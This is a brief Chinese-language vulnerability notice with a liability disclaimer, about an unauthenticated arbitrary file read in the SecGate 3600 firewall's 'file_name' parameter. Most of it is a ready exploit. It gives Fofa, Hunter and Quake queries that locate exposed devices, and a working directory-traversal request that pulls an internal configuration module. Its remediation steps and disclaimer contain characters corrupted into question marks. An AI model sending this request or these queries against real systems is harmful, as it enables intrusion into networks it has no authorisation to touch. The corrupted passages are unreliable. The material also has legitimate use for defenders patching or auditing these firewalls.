免責聲明：

????????本文內容旨在提供有關特定漏洞或安全漏洞的信息，以幫助用戶更好地了解可能存在的風險。公布此類信息的目的在于促進網絡安全意識和技術進步，并非出于任何惡意目的。閱讀者應該明白，在利用本文提到的漏洞信息或進行相關測試時，可能會違反某些法律法規或服務協議。同時，未經授權地訪問系統、網絡或應用程序可能導致法律責任或其他嚴重后果。作者不對讀者基于本文內容而產生的任何行為或后果承擔責任。讀者在使用本文所提供的信息時，必須遵守適用法律法規和相關服務協議，并獨自承擔所有風險和責任。

漏洞描述

某神 防火墻 file_name 參數接口口存在任意文件讀取漏洞，未經身份認證的攻擊者可利用此漏洞獲取服務器內部敏感文件，使系統處于極不安全的狀態。

網絡空間測繪

Fofa

fid="1Lh1LHi6yfkhiO83I59AYg=="

Hunter

title="網神SecGate 3600防火墻"||app.name=="網神 SecGate"

Quake

app: "網神SecGate 3600防火墻"

漏洞復現

/?g=sys_export_conf_local_save&file_name=../modules/system/import_export.mds 

修復建議

1、如?必要，禁?公?訪問該系統。
2、通過防?墻等安全設備設置訪問策略，設置?名單訪問。
3、升級產品到最新版本